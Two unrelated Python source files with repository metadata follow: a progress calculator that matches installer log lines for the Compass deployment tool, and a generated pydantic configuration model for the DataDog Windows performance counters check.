'start_enablefilesystem'),
match_nextline_next_matcher_name=(
'enablefilesystem_done')
),
'enablefilesystem_done': LineMatcher(
pattern=r'leaving.*step.*enablefilesystems',
progress=.35,
message_template='Filesystems are enabled',
unmatch_nextline_next_matcher_name=(
'enablefilesystem_done'),
match_nextline_next_matcher_name=(
'setup_repositories')
),
'setup_repositories': LineMatcher(
pattern=r'moving.*step.*reposetup',
progress=0.35,
message_template=(
'Setting up Customized Repositories'),
unmatch_nextline_next_matcher_name=(
'setup_repositories'),
match_nextline_next_matcher_name=(
'repositories_ready')
),
'repositories_ready': LineMatcher(
pattern=r'leaving.*step.*reposetup',
progress=0.4,
message_template=(
                            'Customized Repositories are set up'),
unmatch_nextline_next_matcher_name=(
'repositories_ready'),
match_nextline_next_matcher_name='checking_dud'
),
'checking_dud': LineMatcher(
pattern=r'moving.*step.*postselection',
progress=0.4,
message_template='Checking DUD modules',
unmatch_nextline_next_matcher_name='checking_dud',
match_nextline_next_matcher_name='dud_checked'
),
'dud_checked': LineMatcher(
pattern=r'leaving.*step.*postselection',
progress=0.5,
                        message_template='DUD modules are checked',
unmatch_nextline_next_matcher_name='dud_checked',
match_nextline_next_matcher_name='installing_packages'
),
'installing_packages': LineMatcher(
pattern=r'moving.*step.*installpackages',
progress=0.5,
message_template='Installing packages',
unmatch_nextline_next_matcher_name=(
'installing_packages'),
match_nextline_next_matcher_name=(
'packages_installed')
),
'packages_installed': LineMatcher(
pattern=r'leaving.*step.*installpackages',
progress=0.8,
message_template='Packages are installed',
unmatch_nextline_next_matcher_name=(
'packages_installed'),
match_nextline_next_matcher_name=(
'installing_bootloader')
),
'installing_bootloader': LineMatcher(
pattern=r'moving.*step.*instbootloader',
progress=0.9,
message_template='Installing bootloaders',
unmatch_nextline_next_matcher_name=(
'installing_bootloader'),
match_nextline_next_matcher_name=(
'bootloader_installed'),
),
'bootloader_installed': LineMatcher(
pattern=r'leaving.*step.*instbootloader',
progress=1.0,
                        message_template='Bootloaders are installed',
unmatch_nextline_next_matcher_name=(
'bootloader_installed'),
match_nextline_next_matcher_name='exit'
),
}
),
FileMatcher(
filename='install.log',
min_progress=0.56,
max_progress=0.80,
line_matchers={
'start': LineMatcher(
pattern=r'Installing (?P<package>.*)',
progress=IncrementalProgress(0.0, 0.99, 0.005),
message_template='Installing %(package)s',
unmatch_sameline_next_matcher_name='package_complete',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='start'
),
'package_complete': LineMatcher(
pattern='FINISHED.*INSTALLING.*PACKAGES',
progress=1.0,
message_template='installing packages finished',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='exit'
),
}
),
]
),
}
PACKAGE_INSTALLER_CONFIGURATIONS = {
'openstack': AdapterItemMatcher(
file_matchers=[
FileMatcher(
filename='chef-client.log',
min_progress=0.1,
max_progress=1.0,
line_matchers={
'start': LineMatcher(
pattern=(
r'Processing\s*(?P<install_type>.*)'
r'\[(?P<package>.*)\].*'),
progress=IncrementalProgress(0.0, .90, 0.005),
message_template=(
'Processing %(install_type)s %(package)s'),
unmatch_sameline_next_matcher_name=(
'chef_complete'),
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='start'
),
'chef_complete': LineMatcher(
pattern=r'Chef.*Run.*complete',
progress=1.0,
message_template='Chef run complete',
unmatch_nextline_next_matcher_name='start',
match_nextline_next_matcher_name='exit'
),
}
),
]
),
}
ADAPTER_CONFIGURATIONS = [
AdapterMatcher(
os_matcher=OSMatcher(
os_installer_name='cobbler',
os_pattern='CentOS.*',
item_matcher=OS_INSTALLER_CONFIGURATIONS['CentOS'],
min_progress=0.0,
max_progress=0.6),
package_matcher=PackageMatcher(
package_installer_name='chef',
target_system='openstack',
item_matcher=PACKAGE_INSTALLER_CONFIGURATIONS['openstack'],
min_progress=0.6,
max_progress=1.0)
)
]
def _get_adapter_matcher(os_installer, os_name,
package_installer, target_system):
"""Get adapter matcher by os name and package installer name."""
for configuration in ADAPTER_CONFIGURATIONS:
if configuration.match(os_installer, os_name,
package_installer, target_system):
return configuration
logging.error('No configuration found with os installer %s os %s '
'package_installer %s, target_system %s',
os_installer, os_name, package_installer, target_system)
return None
def update_progress(os_installer, os_name, package_installer, target_system,
clusterid, hostids):
"""Update adapter installing progress.
:param os_installer: os installer name
:param os_name: os name.
:param package_installer: package installer name.
:param clusterid: cluster id.
:param hostids: hosts ids.
"""
adapter = _get_adapter_matcher(os_installer, os_name,
package_installer, target_system)
if not adapter:
return
adapter.update_progress(clusterid, hostids)
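# Hypothetical invocation sketch; not part of the original module. The installer
# names mirror ADAPTER_CONFIGURATIONS above, while the cluster id and host ids
# are placeholders and a configured compass database is assumed, so the call is
# left commented out:
#
#     update_progress(os_installer='cobbler', os_name='CentOS-6.5',
#                     package_installer='chef', target_system='openstack',
#                     clusterid=1, hostids=[1, 2, 3])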
| {
"content_hash": "80f7c62130b901aae78540abcc0bd890",
"timestamp": "",
"source": "github",
"line_count": 278,
"max_line_length": 78,
"avg_line_length": 44.62589928057554,
"alnum_prop": 0.46525874576817666,
"repo_name": "SysCompass/compass",
"id": "776f1f4107e46ca88c5e7ef7f184552a129b16ba",
"size": "12406",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "compass/log_analyzor/progress_calculator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "396811"
},
{
"name": "Shell",
"bytes": "28158"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from typing import Literal, Mapping, Optional, Sequence, Union
from pydantic import BaseModel, Extra, Field, root_validator, validator
from datadog_checks.base.utils.functions import identity
from datadog_checks.base.utils.models import validation
from . import defaults, validators
class Counter(BaseModel):
class Config:
extra = Extra.allow
allow_mutation = False
aggregate: Optional[Union[bool, Literal['only']]]
average: Optional[bool]
metric_name: Optional[str]
name: Optional[str]
type: Optional[str]
class InstanceCounts(BaseModel):
class Config:
allow_mutation = False
monitored: Optional[str]
total: Optional[str]
unique: Optional[str]
class ExtraMetrics(BaseModel):
class Config:
allow_mutation = False
counters: Sequence[Mapping[str, Union[str, Counter]]]
exclude: Optional[Sequence[str]]
include: Optional[Sequence[str]]
instance_counts: Optional[InstanceCounts]
name: str
tag_name: Optional[str]
use_localized_counters: Optional[bool]
class MetricPatterns(BaseModel):
class Config:
allow_mutation = False
exclude: Optional[Sequence[str]]
include: Optional[Sequence[str]]
class Counter1(BaseModel):
class Config:
extra = Extra.allow
allow_mutation = False
aggregate: Optional[Union[bool, Literal['only']]]
average: Optional[bool]
metric_name: Optional[str]
name: Optional[str]
type: Optional[str]
class InstanceCounts1(BaseModel):
class Config:
allow_mutation = False
monitored: Optional[str]
total: Optional[str]
unique: Optional[str]
class Metrics(BaseModel):
class Config:
allow_mutation = False
counters: Sequence[Mapping[str, Union[str, Counter1]]]
exclude: Optional[Sequence[str]]
include: Optional[Sequence[str]]
instance_counts: Optional[InstanceCounts1]
name: str
tag_name: Optional[str]
use_localized_counters: Optional[bool]
class InstanceConfig(BaseModel):
class Config:
allow_mutation = False
disable_generic_tags: Optional[bool]
empty_default_hostname: Optional[bool]
enable_health_service_check: Optional[bool]
extra_metrics: Optional[Mapping[str, ExtraMetrics]]
metric_patterns: Optional[MetricPatterns]
metrics: Mapping[str, Metrics]
min_collection_interval: Optional[float]
namespace: Optional[str] = Field(None, regex='\\w*')
password: Optional[str]
server: Optional[str]
server_tag: Optional[str]
service: Optional[str]
tags: Optional[Sequence[str]]
use_legacy_check_version: Optional[bool]
username: Optional[str]
@root_validator(pre=True)
def _initial_validation(cls, values):
return validation.core.initialize_config(getattr(validators, 'initialize_instance', identity)(values))
@validator('*', pre=True, always=True)
def _ensure_defaults(cls, v, field):
if v is not None or field.required:
return v
return getattr(defaults, f'instance_{field.name}')(field, v)
@validator('*')
def _run_validations(cls, v, field):
if not v:
return v
return getattr(validators, f'instance_{field.name}', identity)(v, field=field)
@root_validator(pre=False)
def _final_validation(cls, values):
return validation.core.finalize_config(getattr(validators, 'finalize_instance', identity)(values))
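# Hypothetical instance sketch; not part of the generated model. The field names
# come from InstanceConfig/Metrics above; the performance object, counter names
# and tag values are placeholders:
#
#     instance = {
#         "metrics": {
#             "Processor": {
#                 "name": "cpu",
#                 "counters": [{"% Processor Time": "percent_processor_time"}],
#             },
#         },
#         "server": "localhost",
#         "tags": ["env:test"],
#     }
#     config = InstanceConfig(**instance)  # applies the defaults and validators wired in above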
| {
"content_hash": "8c8d2c8be8b7c66a66d3a9d631470b1d",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 110,
"avg_line_length": 26.992248062015506,
"alnum_prop": 0.6872487076392878,
"repo_name": "DataDog/integrations-core",
"id": "6eb6abfa206dd7aef4201819b67d4a47dbdb4adb",
"size": "3839",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "windows_performance_counters/datadog_checks/windows_performance_counters/config_models/instance.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "578"
},
{
"name": "COBOL",
"bytes": "12312"
},
{
"name": "Dockerfile",
"bytes": "22998"
},
{
"name": "Erlang",
"bytes": "15518"
},
{
"name": "Go",
"bytes": "6988"
},
{
"name": "HCL",
"bytes": "4080"
},
{
"name": "HTML",
"bytes": "1318"
},
{
"name": "JavaScript",
"bytes": "1817"
},
{
"name": "Kotlin",
"bytes": "430"
},
{
"name": "Lua",
"bytes": "3489"
},
{
"name": "PHP",
"bytes": "20"
},
{
"name": "PowerShell",
"bytes": "2398"
},
{
"name": "Python",
"bytes": "13020828"
},
{
"name": "Roff",
"bytes": "359"
},
{
"name": "Ruby",
"bytes": "241"
},
{
"name": "Scala",
"bytes": "7000"
},
{
"name": "Shell",
"bytes": "83227"
},
{
"name": "Swift",
"bytes": "203"
},
{
"name": "TSQL",
"bytes": "29972"
},
{
"name": "TypeScript",
"bytes": "1019"
}
],
"symlink_target": ""
} |